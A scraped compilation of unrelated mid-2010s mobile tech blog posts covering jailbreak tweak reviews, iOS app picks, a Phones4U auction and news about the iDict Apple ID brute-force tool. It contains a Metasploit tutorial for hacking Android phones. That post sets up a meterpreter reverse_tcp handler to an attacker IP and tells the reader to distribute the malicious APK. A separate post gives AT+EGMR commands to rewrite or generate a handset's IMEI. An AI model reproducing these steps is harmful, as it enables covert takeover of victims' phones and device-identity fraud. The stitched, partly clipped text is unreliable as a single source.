Circulate is a new jailbreak tweak that brings new animation styles to the stock Clock app icon. Circulate is a great looking tweak that comes bundled with two themes out of the box. The themes, which consist of a circular theme and a bar-graph looking theme, allow you to measure time in two unique ways.
After installing Circulate, you can configure its look via the preferences in the stock Settings app. I was highly impressed by how responsive the tweak’s settings were, and how none of the changes required a respring.
Both the Concentric Circles theme and the Rising Bars theme can be color customized, and each customization changes dynamically based on the current theme selected. For example, with the Rising Bars theme, you are limited to changing the bar color and bar background color for the seconds, minutes, and hours bars. With the Concentric Circles theme, the customization options change to include things like ring width and radius.
I also really appreciate the inclusion of a “reset settings to default” option. I can’t tell you how many developers omit such a simple, yet vital option, but it’s included with Circulate.
Circulate is available for $0.99 on Cydia’s BigBoss repo, and I deem it to be a great value. It’s a unique tweak that allows you to theme the stock Clock app icon with two really cool built-in themes. Here’s hoping that we will see more theme packs in the future.
As of today, brute-forcing your way into your ex’s Apple ID or iCloud account by way of dictionary-based attacks is no longer a viable option.
As reported by James Cook of Business Insider, Apple’s reportedly patched a vulnerability in its iCloud service that determined hackers were able to exploit in order to hack into your Apple ID account.
Even though Apple IDs that employ weak passwords and don’t use Apple’s vaunted two-step verification feature were at greatest risk, we’re most certainly glad that Apple’s moved so swiftly to increase online security of its users.
The information came via none other than Pr0x13, a guy who created a hacking tool called “iDict” which was released on New Year’s Day.
Long story short, it managed to bypass Apple’s account lockout restrictions and secondary authentication on any Apple ID or iCloud account.
You may recall that Apple recently tightened up iCloud security by locking an Apple ID after five unsuccessful attempts to enter the password. That being said, ‘iDict’ tool in its brief history used to rely on a different method to fool Apple’s servers into believing a real person was trying to log in to iCloud.
Put simply, iDict pretended to be a legitimate iPhone device trying to log in to iCloud.com. The online service used brute-force attacks on accounts with weak passwords by tapping a dictionary list containing more than 500 commonly used words, although there was nothing preventing determined hackers from using a much larger word list than the one posted on GitHub.
That doesn’t mean we should all breathe a collective sigh of relief because hackers are always searching for exploits and Apple’s online services have yet to be fully consolidated to discourage, if not prevent, these types of brute-force attacks.
Another thing to factor in: ill-minded folks who may use tools like iDict could cause your iCloud account to be locked for security reasons, to prevent hackers from gaining access in the first place.
Same caveats apply here: your password should not contain common terms such as pet names and other easily identifiable words that can be harvested by means of social engineering.
Moreover, you should enable two-step verification for your Apple ID and preferable use a throwaway email address as your Apple ID user name or a private email address which hasn’t been shared online.
And if you do protect your Apple ID with two-step verification, please store your Recovery Key in a safe place because misplacing it means losing access to your Apple ID for good in case it gets locked due to brute-force attempts on your password.
After flashing ROMs or installing updates, it is possible that the phone will get an invalid IMEI or unknown baseband. Invalid IMEI would mean no mobile network connections. This tutorial will help you restore / fix lost / missing IMEI and Serial Numbers for MT6582, MT6572, MT6592, MT6589, MT6595 One method of restoring/repairing an invalid IMEI or unknown baseband is outlined in this tutorial. If this method does not work, you may try using MTK Droid Tools to manually enter IMEI numbers. If these methods fail, check to see if you have a valid Serial Number. 1. From your phone keypad, type in *#66#.
2. Tap on SN. If it shows a blank space, that means you would first have to restore your Serial Number before you can work on fixing the IMEI.
NOTE: This method assumes your Serial Number is also invalid or null. However, if you have a valid Serial Number and only need to restore IMEI, you can still use this guide. Just choose method B below and do the IMEI Download option.
Baseband configuration (.ini) file from manufacturer OR Serial Number and IMEI Numbers shown on the sticker on your phone’s battery tray
Connect to Maui META
1. Extract and install Maui META Software. Do not launch the program yet. 2. Switch your phone on and connect it to your PC. Install MediaTek VCOM Drivers. 3. Disconnect your phone and turn it off. 4. Keeping Device Manager open and visible in the background, locate MauiMETA Program and Run as Administrator. 5. Click on Options in the menu bar, and select “Connect Smart phone into META mode”
6. Click on Reconnect. Maui META will now ask you to “Please connect cable to target and then power on”. 7. Connect your phone to the PC, but DO NOT turn it on. Maui META will trigger the power up sequence. You should hear about 2 connect-disconnect sequence sounds from your PC.
a. During the first connection to Maui META, your phone will boot partially while CDC VCOM Drivers are installed automatically. Wait for it to finish.
b. After successful installation, you should see “Gadget CDC VCOM Driver (COMxx)” in Device Manager.
c. Even if the installation was successful, Maui META may still be unable to connect to your phone. If this is the case, close Maui META and disconnect your phone. Shut your phone off manually.
d. Run Maui META as administrator again and repeat step 5 to 7 and proceed to step 8.
8. Check if the connection was successful.
It is successful if you see the following:
Your phone will appear in Device Manager as a Gadget CDC VCOM Driver (COMxx)
Maui META indicates “Connected with Target” and shows your RF chip versions
Your phone shows a static boot logo
If the connection was successful, proceed to step 9. However, f your phone shows as a MediaTek Preloader in Device Manager, or if your phone starts charging via USB, follow the steps below.
a. Go to Device Manager, highlight your phone in the list and right-click on it. Choose to update drivers manually, then point to this folder: (D:\…\MTK_USB_ADB_Ultimate\All MTK USB Driver 2014 Properties)
b. Disconnect your phone, and repeat steps 5 to 8.
c. If you are continuously returning to these sub-steps, try using a different USB port.
(note: If your phone is not showing in Device Manager at all, uninstall drivers. Download USBdeview software, Run as Administrator, then uninstall your phone’s Device IDs. Restart at step 2.)
9. Once your phone boots into META mode, a Get Version pop up window will appear. Ignore and close this window.
Restoring Values
From here, there are two possible methods to go through. If the Update Parameter does not work (i.e. no successful flash message), do method B. A. Update Parameter
A.1. In the main Maui META window, click on the drop down menu and select Update Parameter.
A.2. At the bottom of the pop up window, tick Barcode.
A.3. Click on “Change NVRAM Database” and select the NVRAM Database file that is suitable for your current ROM. Click Open.
A.4. Click on “Load from File” and select the .ini file that is compatible with your phone.
A.5. Click on Download to Flash and wait for this message: “Download Barcode Settings to flash successfully”.
B. Barcode Download + IMEI Download
B.1. Barcode Download
B.1.1. In the main Maui META window, click on the drop down menu and select Barcode Download.
B.1.2. Click on “Change NVRAM Database” and select the NVRAM Database file that is suitable for your current ROM. Click Open.
B.1.3. Type in the Serial Number you obtained from the back of the phone.
(If you are restoring a backup, click on “Load from File” and select the appropriate .ini file.)
B.1.4. Click on “Download to Flash”. Check the bottom of the window to see if the flash was successful.
B.1.5. Close the Barcode Download window.
B.2 IMEI Download
B.2.1. In the main Maui META window, click on the drop down menu and select IMEI Download.
B.2.2 Click on “Change NVRAM Database” and select the NVRAM Database file that is compatible with your current ROM version. Click Open.
B.2.3. In the SIM1 tab, type in the IMEI for SIM1. (Note: the last number of the IMEI goes into the checksum box.)
B.2.4. Click on SIM2 tab, and enter the IMEI for SIM2.
(If you are restoring a backup, select “Load From File” and select the appropriate .ini file. You only need to load this once for both IMEI numbers.)
B.2.5. Click on “Download to Flash”. Check the bottom of the window to see if the flash was successful.
Exiting META Mode
1. Close all pop-up windows.
2. Click on Disconnect, you should see a message saying “Please Standby”
3. Wait for Gadget CDC VCOM Driver to disappear from Device Manager List.
4. Wait for your phone to shutdown and enter charging mode.
5. Close Maui META and disconnect your phone.
You may now reboot your phone and check via *#66# and *#06# if you now have a valid Serial Number and IMEI Numbers.
One of the top problems users of MediaTek phones have is how to fix an invalid IMEI on MTK / MediaTek MT6589 MT6589T MT6592 MT6595 MT6572 MT6582 MT6577 MT6516 phones.
This tutorial will show you several ways to repair the invalid IMEI on an MTK / MediaTek phone. We’ll start with one of the easiest. It requires a simple app install, a few taps and one line command. Before we start, download the engineer app, install and run.
Select Engineer Mode
Select Engineer Mode MTK
Select CDS Information from the Connectivity tab
Select Radio Information
Select the SIM you wish to change the IMEI on
At the AT+ line for SIM 1, enter AT+EGMR=1,7,THE-FIRST-IMEI-NUMBER. For SIM 2, enter AT+EGMR=1,10,THE-SECOND-IMEI-NUMBER. Of course where the words are, you will enter a number.
For #6, you should enter the IMEI from the box of your phone or information under the battery. In some cases, a dual SIM phone will have the same IMEI for both SIM slots. In the case that your carrier doesn’t allow this, or if you have some other reason you need to change the stock IMEI, you may need to generate / calculate / find a new IMEI with the correct checksum / check digit on your MTK6589 MTK6589T MTK6592 MTK6595 MTK6572 MTK6582 MTK6577 MTK6516 phones. To do so, follow the instructions in this post at the forum.
This is only one method of many. I will be adding more methods over time to this post. In the meantime,
Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.
Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:
Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial: Attacker IP address: 192.168.8.94 Attacker port to receive connection: 443 Requirements: 1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial) 2. Android smartphone (we use HTC One android 4.4 KitKat)
Step by Step Hacking Android Smartphone Tutorial using Metasploit:
1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut. 2. We will utilize Metasploit payload framework to create exploit for this tutorial.
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command
3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will use Metasploit handler set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2
4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker IP address set lport 443 –> port to listen the reverse connection exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution ). 6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:
7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.
See the video below if you are not clear about the step by step Hacking Android Smartphone Tutorial using Metasploit above:
Conclusion: 1. Don't install APK's from the unknown source. 2. If you really want to install APK's from unknown source, make sure you can view, read and examine the source code. The picture below is the source code of our malicious APK's in this tutorial.
The holiday season is officially over and the New Year has begun. Let 2015 begin. I’ve had my fill of nog and libations and will be spending the first quarter of the year trying to work off all that extra cookie weight I’ve gained.
If you are looking for some apps to help you keep your New Year’s Resolution, check out our list of apps to start the New Year off right. If you are just looking for something to fill your iPhone, iPad, or iPod touch up, check out our spotlight of apps and games this week.
If keeping a budget is on your list of resolutions for this year, then SilverWiz has the app for you. This personal finance tracker keeps all of your banking, bills, income, and expenses in one convenient location. You can create and set budgets for your personal monthly finances with daily allowances and remaining days. Get notifications when you are dangerously close to going over budget. See where you spend money the most with an easy-to-read graph. Track your various expense accounts in one place instead of multiple apps. For a monthly fee, you can even connect your online banking to MoneyWiz and see transactions automatically. This app is available for $4.99.
There are so many different types of racing games in the App Store that it is hard to keep up. This one stands out in the crowd because it puts you in the driver’s seat of a World Rally car. You can play out your career in the Season section, jump into a Quick Race for a less in-depth game, challenge opponents in Super Special Stages, and race random drivers in the Daily Race. Each win earns you Speed Points, which you can use to repair damage and unlock new sections of the game. Race your rally car across snow-covered mountains, through forests, and along dusty roads. This game is available for $3.99.
Fans of the Bionicle series will be happy to see that LEGO has launched a new title staring the mechanical super beings. Players take control of one of six Toa heroes, Tahu, Kopaka, Onua, Pohatu, or Lewa and fight hordes of enemies across vast battlefields. It’s not just about fighting, though. Players must also track down the lost Masks of Power by traveling through various elemental regions. You’ll collect various parts of the Masks. There are 74 arenas throughout Okoto. You can also hone your fighting skills in endless mode, where you must stay alive for as long as possible. This game is available for free.
This app is actually not that new, but I only discovered it earlier this week and I think it is worth mentioning because of its cool features. With MultiCam, you can change the focus of objects after you’ve taken the picture. It works best with one object at very close range and the other further back. Set the focus points and exposure range and take a series of pictures all at once. Then, in the Editor, slide the focus bar from one side to the other to see the different objects become clear or blurred. It is like having a truncated version of a Lytro right on your iOS device. This app is available for $1.99.
I really am a sucker for the widgets. I also love knowing about the phases of the moon. How many times have you looked into the night sky and been in awe of the moon? This app gives detailed information on the moon’s current phase, plus more information about the date and time of upcoming phases. You can also read up on the history of names of each month’s full moon (I didn’t even know they had names). The Notification Center extension puts a pared down version of that information right on your Lock screen so you’ll always know the moon’s phase and what to expect in the future. This app is available for $0.99.
Folderix is an upcoming jailbreak tweak that lets you quickly swipe between all of the folders that you have on your iPhone without exiting the folder interface. If you have lots of folders created on your device, this is one of the fastest ways to navigate between them.
The tweak, which will presumably touch down on Cydia’s BigBoss repo for a confirmed $0.99 asking price, features several options to configure in its preferences as well. Inside of the neatly-designed prefs, you’ll find a kill-switch, respring button, and a Configuration section. I’ve reviewed some of this developer’s (Smartviper E75) tweaks before, and I can say for sure that this is the best looking implementation that I’ve seen from him yet.
Inside of the Configuration section, you’ll find several options to toggle folder animation, pinch to close, hide page dots, close folders on launching an app, and a folder colorization option. On their own, none of these settings are really a huge deal, especially when compared to an all encompassing tweak like Springtomize 3. But coupled with the ability to quickly swipe between folders directly from the folder interface, and things get a bit more interesting. I will say that throughout my brief usage with Folderix, I encountered a few graphical glitches with page dots and with folder background colors. I also experienced periods of time where the swiping between folders seemingly quit for no reason. Hopefully, there’s still time for some of these issues to be cleaned up before the tweak launches on Cydia publicly. There’s certainly nothing mind-blowing about Folderix, but it’s a generally well-designed tweak with a purpose. What do you think about Folderix? Does its primary function appeal to you? Sound off down below in the comments with your thoughts and opinions
Have you ever been in a situation where you would like to lock your iPhone in a discrete manner? Perhaps someone has asked to see your iPhone, or they’ve figured out your password, and they want to examine your phone. Obviously, you could just say no, but if you’re the passive aggressive type of person, you could just use PanicLock for iOS 8 instead. PanicLock allows you to quickly and discretely lock access to your iPhone’s app icons using simple Activator gestures. After installing the tweak, simply head to the tweak’s preferences, and you’ll be able to configure the Activator gesture of your choice. I recommend using an Activator gesture that requires the use of the iPhone’s physical hardware buttons. That way, you can use PanicLock as discretely as possible. After you enable PanicLock, you’ll still be able to peruse your iPhone’s Home screen, but when you tap on an app the app won’t load. You’ll need to disable PanicLock by means of the same Activator gesture to regain access to your apps. PanicLock is available free of charge on the BigBoss repo, and it’s a good way to secure your iPhone undetected. Share your thoughts and use case scenarios down below in the comment section.
adies and gentlemen, boys and girls. It’s the end of 2014, and that can only mean one thing: it’s time to compile our list of the best jailbreak tweaks of 2014.
To be eligible to make this list, the jailbreak tweak or app must have been released in 2014, it can’t be an update or a sequel to another tweak released prior to 2014, it must work on the latest iOS 8 jailbreak, and it must be compatible with the iPhone 6 and 6 Plus. That means that tweaks like Auxo 3, which would have otherwise made the list, are not included. I know those are some pretty tough regulations, but by doing it this way, we ensure that we have an original list full of fresh and new jailbreak apps and tweaks that you can use today.
Okay, enough talk. Let’s get into our list of the best jailbreak releases of 2014. Will your favorite tweak make the list?
#15: PM, really?
Developed by Jay Zuerndorfer, PM, really? is an extremely practical jailbreak tweak that can help prevent you from making the catastrophic mistake of setting your alarm for the evening instead of the morning. PM, really? prompts you for a confirmation whenever you try to create an alarm for PM instead of AM.
I felt this tweak deserved to be on the list because it solves a real issue. It doesn’t happen often, but I’ve personally experienced how it feels to wake up late and realize that my alarm never sounded due to being set to PM instead of AM. I also like this tweak because it’s completely original, and doesn’t mimic any other tweaks on Cydia. Good job, Jay.
Developer: Jay Zuerndorfer
Price: Free
Repo: BigBoss
#14: LockGlyph
evilgoldfish’s LockGlyph is a jailbreak tweak that spices up the experience of unlocking your iPhone. It does so by adding the Apple Pay confirmation animation and sound to the Lock screen. It’s a stylish tweak that adds some flair to the Lock screen, but I’ve been most impressed by evilgoldfish’s diligence when it comes to adding new features to LockGlyph, taking requests, and keeping it compatible with the latest firmware.
Developer: evilgoldfish
Price: Free
Repo: BigBoss
#13: WeatherBoard
If you’re looking for a jailbreak tweak to show off to your friends, then look no further than Allan Kerr’s WeatherBoard. This is a jailbreak tweak that brings animated wallpapers to your iPhone’s Home screen. These wallpapers reflect current conditions in your area and will change as the weather changes outside. In all, there are over 80 animated weather wallpapers to choose from.
If Aaron Ash’s Barrel jailbreak tweak is one of the best tweaks to show off a jailbroken iPhone, then it stands to reason that Cylinder, a tweak heavily inspired by Barrel and released this year for free, deserves to be on this list. Reed Weichler’s Cylinder brings an astonishing 35,184,372,088,832 different Home screen icon animations to the table, and you can also create your own animations using handy Lua scripts. Yes, the Barrel inspiration is undeniable, but Cylinder is impressive enough to stand on its own.
One of the most annoying things about the stock Music app is that you can’t queue up music when a song is already playing. Aria solves this problem by bringing “Play Next” and “Play Last” capability to the Music app. But that’s not all. Aria provides users with an interesting new grid view among other niceties to spice up the aging Music app.
The ability to use HeySiri without being tethered to a power connection can make all of the difference when your hands are full and you can’t interface directly with the iPhone’s Home screen. UntetheredHeySiri is the first jailbreak tweak that allows you to do such a thing, and it integrates perfectly with the stock Siri preferences in the Settings app.
Virtual Home allows you to emulate a press of the Home button using nothing more than the Touch ID sensor. With Virtual Home, you can give your Home button a break and simply tap on the Touch ID sensor to simulate Home button presses. It was the very first Touch ID jailbreak tweak to appear on Cydia and it’s still receiving support today.
Note: While technically a sequel, we felt this tweak deserved to be included since its predecessor was created in 2014. It wouldn’t be fair to punish the developer for keeping their tweak, which debuted this year, updated for iOS 8.
Developer: moeseth
Price: $1.49
Repo: BigBoss
#8: Aeternum
There are plenty of Apple Watch UI concepts available, but Aeternum stands above the rest as being the best. Aeternum has been updated numerous times, it’s stable, fully theme-able, and battery friendly. If you want to know what the Apple Watch UI looks like in person, then Aeternum is your go-to tweak.
Note: This developer has multiple tweak of the year nominations. The other is iTouchSecure.
There are lots and lots of screenshot jailbreak tweaks on the Cydia store, but none of them hold a candle to Almpoum, a tweak that is simply a must-have for heavy screenshot takers. Almpoum allows you to upload screenshots to Imgur, save screenshots to specific albums, and quickly share a screenshot via AirDrop or any other utility appearing in the iOS 8 share sheet. It makes my job a whole lot easier.
Ryan Petrich’s Little Brother brings scaling options to jailbroken iOS devices. This means that you can bring iPhone 6 scaling to a lesser device like the iPhone 5s. This results in increased real estate, two-up landscape mode in supported apps, Home screen landscape mode, and even Lock screen landscape support.
Note: This developer has multiple tweak of the year nominations. The other is BioLockdown.
If you’re a gamer, then it’s easy to see the value of Controllers for All. Here is a jailbreak tweak that makes it possible to use your Wii U Pro Controller, PS3, and PS4 controllers with any game that supports Apple’s MFi controller initiative. There simply is no excuse not to have Controllers for All if you’re the least bit interested in gaming on iOS.
Developer: Ori Kadosh
Price: $1.99
Repo: ModMyi
#4: iTouchSecure for iOS 8
Now that users can use 1Password directly within Safari thanks to iOS 8’s extensions, it’s made life a whole lot easier. No longer do we have to switch between apps to copy passwords from our password management app of choice. But iOS still has some opportunities for improvement on this front, especially when it comes to using apps that feature no built in 1Password support. Enter iTouchSecure, a jailbreak tweak that allows you to save passwords for your favorite apps directly in the iOS keychain. That means that you can auto login to your favorite banking app using just your Touch ID fingerprint. It’s a time-saver if you manage your bank account using a banking app.
Note: While technically a sequel, we felt this tweak deserved to be included since its predecessor was created in 2014. It wouldn’t be fair to punish the developer for keeping their tweak, which debuted this year, updated for iOS 8.
Note: This developer has multiple tweak of the year nominations. The other is Aeternum.
Got two Instagram accounts? If so, you can’t normally use both on the same iOS device without logging out of one, and logging in with another. That, of course, is a real pain in the butt. Slices solves that issue. It allows you to log in to multiple accounts on the same app, even when said app doesn’t support multiple users. I use it to manage my personal and work Instagram accounts, and it performs perfectly.
Developer: Steve Hetelekides
Price: $1.99
Repo: BigBoss
#2: BioLockdown
Yet another Ryan Petrich created jailbreak tweak shows up on our 2014 list. BioLockdown is an excellent tweak that lets you passcode protect individual apps, settings, and even Control Center switches. The cool thing about BioLockdown is that it works with the Touch ID fingerprint sensor, providing you with excellent security for your most sensitive apps and settings. Once you use BioLockdown, you’ll be presented with a ton of different settings to customize and configure the tweak to your liking.
Note: This developer has multiple tweak of the year nominations. The other is LittleBrother.
#1: iMacJunkie's Jailbreak Tweak of the Year: Tage
Remember Zephyr? Well, Zephyr’s dead, but Tage is the closest thing we’ve seen like Zephyr since, well, Zephyr. Tage allows you to close apps and invoke the App Switcher using nothing but gestures. It brings the iPad-inspired Multitasking gestures to the iPhone, which lets you to switch between apps using swipes from the edge of the screen, and it has a quick switcher, which brings the ability to quickly between apps via the App Switcher using a single gesture! In fact, the Quick Switcher found in Tage might not be as pretty as the one found in Auxo 3, but I find it to be more responsive.
Tage is a very robust jailbreak tweak that makes navigating your iPhone with gestures easy and fun to use, and it features a ton of options and settings to configure it just to your individual liking. For that reason, it is without a doubt our jailbreak tweak or 2014.
Congratulations to Ryan Petrich and SpiritofLogic for picking up two Tweak of the Year award honors, and congratulations to Ma Jun for bringing home the award for best jailbreak tweak of 2014.
Thank you for reading and watching this year’s edition of the best jailbreak tweaks! Please use the comment section below to leave a remark, an opinion, or to congratulate your favorite developers.
Friday, a new attack tool was posted to GitHub that uses brute-force dictionary attacks on iCloud and Apple ID accounts with weak passwords. Using a dictionary list containing more than 500 words, the ‘iDict’ tool pretends to be a legitimate iPhone device trying to log in to iCloud.com. Somehow, it manages to avoid Apple ID lockout restrictions.
People with complex passwords shouldn’t be concerned but those with simple ones based on commonly used words such as pet names are at risk. If you fall in that category, you’re wholeheartedly recommended to change your password and optionally enable two-step verification for your Apple ID.
Seemingly unrelated to ‘iDict’, the Photos web app mysteriously disappeared from the iCloud website this morning.
Apple in the aftermath of the celebrity photo hacking incident has tightened up iCloud security. As part of the change, the system now locks an Apple ID after five unsuccessful attempts to enter the password.
It’s worrying that a hacker known as Pr0x13, the brains behind ‘iDict’, claims his tool actually bypasses Apple’s account lockout restrictions and secondary authentication on any Apple ID or iCloud account.
“This bug is painfully obvious and was only a matter of time before it was privately used for malicious or nefarious activities, I publicly disclosed it so Apple will patch it,” release notes read.
According to Redditors and Twitter users, the tool works as advertised.
It’s astounding to me that Apple would permit these types of login attempts to this date without locking the account after several unsuccessful requests. Here’s hoping they patch the security hole sooner than later.
As 9to5Mac’s Benjamin Mayo noted, the threat is real and shouldn’t be waived off lightly because determined hackers use a much larger word list than the one posted on GitHub.
And like I said before, the Photos web app (pictured above) has disappeared from both the www.iCloud.com and beta.iCloud.com website this morning. We couldn’t determine at post time whether this removal was permanent or temporary or if any eventual connection to the release of the ‘iDict’ tool is purely coincidental.
We’ll update the post when Photos reappears on iCloud.com.
The web app is part of iCloud Photo Library, Apple’s new solution to manage and sync photos across devices. Currently in beta, iCloud Photo Library can be enabled on iOS 8 devices under Settings > iCloud > Photos.
As part of this new photo-management solution, Apple confirmed winding down Aperture and iPhoto development in favor of an upcoming Photos app for the Mac, due in early-2015.
As for ‘iDict’, the easiest way to protect your Apple ID from hacking is to enable an additional layer of security in the form of Apple’s vaunted two-step verification.
With two-step verification enabled, you’ll need the code pushed to a trusted device whenever you sign in to My Apple ID to manage your account, sign in to iCloud on a new device or at iCloud.com, make an iTunes, iBooks or App Store purchase from a new device or get Apple ID related support from Apple.
ou should absolutely ensure to store a 14-character Recovery Key that gets generated for you after you’ve enabled two-step verification in a safe place — you’re going to need it if you want to regain control of your account should you get temporarily locked out due to brute-force attacks.
Again, losing your Recovery Key means losing access to your Apple ID for good and the company can’t help you regain access without it.
Last but not least, since ‘iDict’ needs an Apple ID email address, you could also make your account more secure by using a private email address which hasn’t been shared online.
UK retailer Phones4U shut down its online store and closed its retail operations earlier this year when the struggling company entered administration, the UK equivalent of bankruptcy. Now in the middle of the administration process, Phones4U is ready to liquidate its existing stock of products, including its entire inventory of iPhones, iPads and Beats headphones.
UK auction house John Pye Auctions is handling the liquidation of Phones4U stock, which includes more than 600,000 items worth £10.8m in what is the UK's biggest auction of the year. Among the auction items are Beats headphones, iPhone 5/5c units, iPad Air and iPad mini models.
The items are being sold in individual lots for public purchasing and not wholesale trade job orders. Online bidding is active now with many auctions listed with zero bids. For auctions that do have bids, prices are currently very low. Some entry-level iPad mini and iPad Air models are available for as little as £2 ($3USD).
It appears that the auction site will accept bids from both within the UK and from international buyers, but the auction house will not be shipping items. Buyers must pick up items in person or make their own arrangements for shipment.
Bidding on the auction ends Tuesday, January 6, 2015 with a public showing available on Monday, January 5, 2015 from 10am to 2pm at John Pye & Sons warehouse in Staffordshire.
).
